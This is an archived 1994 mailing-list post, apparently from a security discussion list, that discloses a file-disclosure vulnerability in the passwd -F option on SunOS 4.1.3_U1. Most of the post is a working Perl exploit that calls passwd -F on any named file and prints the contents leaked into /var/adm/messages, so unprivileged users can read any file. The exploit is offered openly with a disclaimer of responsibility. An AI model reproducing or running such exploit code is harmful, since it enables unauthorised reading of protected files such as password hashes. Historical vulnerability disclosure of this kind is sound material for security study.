passwd -F

Steve Mitchell (steve@cati.csufresno.edu)
Tue, 10 May 94 17:19:53 PDT

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: David Bianco: "Time For New Security Package? (was Re: new iss stuff)"
Previous message: Pat Myrto: "Re: new iss stuff"
Next in thread: Pat Myrto: "Re: passwd -F"

FYI, this vulnerability exists on 4.1.3_U1.  I do not know how
widespread knowledge of this vulnerability is, but I have seen Suns
running a modified passwd program that has "-F option disabled" (according
to the message output by passwd).  So somebody out there has known about
it for a while.

The following trivial perl script allows non-privileged users to 
easily read any file on the system.

--steve

-- 
Steve Mitchell      KD6BET       TIP#168       steve_mitchell@csufresno.edu
"STUFF: Anything that can be used for homebrewing."  "JUNK: Everything else
you thought could be used for homebrewing, but can't."    --Steve Casselman


#!/usr/local/bin/perl
#
# Author disclaims all responsibility for misuse of this script
#  --sjm 5/10/94

$file = shift || die "Usage: $0 filename\n";

open(A,"</var/adm/messages");

@statf = stat(A);

system("/usr/bin/passwd -F $file 1>&2 2>/dev/null");

seek(A,$statf[7],0);

while(<A>) {
	next if !/passwd/;
	($stuff,$line) = split(/"/,$_,2);
	print $line;
}

Next message: David Bianco: "Time For New Security Package? (was Re: new iss stuff)"
Previous message: Pat Myrto: "Re: new iss stuff"
Next in thread: Pat Myrto: "Re: passwd -F"